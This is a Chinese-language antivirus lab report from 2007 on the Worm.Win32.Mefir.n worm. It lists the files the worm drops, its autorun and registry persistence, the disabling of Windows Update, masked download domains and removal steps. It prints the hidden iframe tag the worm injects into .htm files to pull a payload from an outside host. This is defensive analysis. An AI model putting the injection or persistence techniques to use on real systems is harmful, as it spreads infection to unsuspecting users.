安天实验室 Worm.Win32.Mefir.n分析

安全响应·Security

病毒分析报告·Report

Worm.Win32.Mefir.n分析

出处：安天CERT 时间：2007-10-24 13：30

病毒标签：
	病毒名称： Worm.Win32.Mefir.n 病毒类型：蠕虫类文件 MD5： 839C1B2CA8EF71F8052E09FE8EC7394B 公开范围：完全公开危害等级：高文件长度： 29,477字节感染系统： Windows98以上版本开发工具： Borland Delphi 加壳类型： FSG 2.0
病毒描述：
	该病毒属于蠕虫类，运行后衍生病毒副本到各个驱动器的根目录下，并且释放AutoRun.inf 文件，该文件作用是当用户打开驱动器时自动运行衍生到各个驱动器根目录下的病毒副本；删除自身；遍历磁盘搜索后缀名为.htm的文件，并修改文件，当打开该文件时，病毒就会被执行。

行为分析：

本地行为：

1、文件运行后会释放以下文件：

　　　　%DriveLetter%\autorun.inf 　　　　　　159字节
　　　　%DriveLetter%\niu.exe 　　　　　　　　29,477字节
　　　　%system32%\Autorun.inf 　　　　　　　 159字节
　　　　%system32%\SVSH0ST.EXE 　　　　　　　 29,477字节
　　　　%system32%\temp1.exe 　　　　　　　　 2,186字节
　　　　%Documents and Settings%\Santiago\Local Settings\Temporary
　　　　InternetFiles\Content.IE5\8529WLSR\expiration[1].htm 　　　　2,282字节
　　　　%Windir%\SoftwareDistribution\DataStore\Logs\edb00008.log 　 131,072字节
　　　　%Windir%\SoftwareDistribution\DataStore\Logs\edb00009.log 　 131,072字节
　　　　
2、新增注册表：
　　　　
　　　　[HKEY_CURRENT_USER\Software\Microsoft\Windows
　　　　\CurrentVersion\Policies\WindowsUpdate]
　　　　注册表值："DisableWindowsUpdateAccess"
　　　　类型：REG_DWORD
　　　　值：01, 00, 00, 00
　　　　描述：屏蔽Windows更新

　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
　　　　注册表值："svchost"
　　　　类型：REG_SZ
　　　　值：C:\WINDOWS\system32\SVSH0ST.EXE
　　　　描述：添加自启动项

3、在后缀为.htm的文件中插入如下代码：

　　　　<IfrAmE src=http://www.rx****.cn/web.htm width=50 height=0></IfrAmE>

网络行为：

1、连接网络下载病毒文件：

连接网络，在下列链接下载文件，【链接已失效】

　　　　www.rxj***.cn(219.153.67.**)
　　　　slz5588.3***.org(210.51.10.**)
　　　　www.t***r.com(210.51.1.***)

2、尝试链接http://www.rx****.cn/TJ.asp。
　　　　
注： %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
　　
　　　　%Windir% 　　　　　　　　　　 WINDODWS所在目录
　　　　%DriveLetter%　　　　　　　　逻辑驱动器根目录
　　　　%ProgramFiles%　　　　　　　系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　　　　　　　　\当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　　　　　　　　　　　　　　　　　　

清除方案：
	1 、使用安天木马防线可彻底清除此病毒 ( 推荐 ) 2 、手工清除请按照行为分析删除对应文件，恢复相关系统设置。　　 (1)使用安天木马防线“进程管理”关闭病毒进程。　　 (2)删除病毒文件：　　　%DriveLetter%\autorun.inf 　　　 159字节　　　%DriveLetter%\niu.exe 　　　　　29,477字节　　　%system32%\Autorun.inf 　　　　 159字节　　　%system32%\SVSH0ST.EXE 　　　　 29,477字节　　　%system32%\temp1.exe 　　　　　2,186字节　　　%Documents and Settings%\Santiago\Local Settings 　　　\Temporary Internet Files\Content.IE5\8529WLSR 　　　\expiration[1].htm　　　　　　2,282字节　　　%Windir%\SoftwareDistribution\DataStore\Logs 　　　\edb00008.log 　　　　　　　 131,072字节　　　%Windir%\SoftwareDistribution\DataStore\Logs 　　　\edb00009.log 　　　　　　　 131,072字节　　 (3)恢复病毒修改的注册表项目，删除病毒添加的注册表项：　　　 [HKEY_CURRENT_USER\Software\Microsoft 　　　 \Windows\CurrentVersion\Policies\WindowsUpdate] 　　　注册表值："DisableWindowsUpdateAccess" 　　　类型：REG_DWORD 　　　值：01, 00, 00, 00 　　　描述：屏蔽Windows更新　　　 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft 　　　 \Windows\CurrentVersion\Run] 　　　注册表值："svchost" 　　　类型：REG_SZ 　　　值：C:\WINDOWS\system32\SVSH0ST.EXE 　　　描述：添加自启动项　　 (4)修复被病毒修改的后缀为.HTM的文件。
附：
	点击此处下载木马防线2005+ 病毒上报信箱: submit@virusview.net

[TOP]

- 英文网站　网站地图　诚聘精英　联系我们 -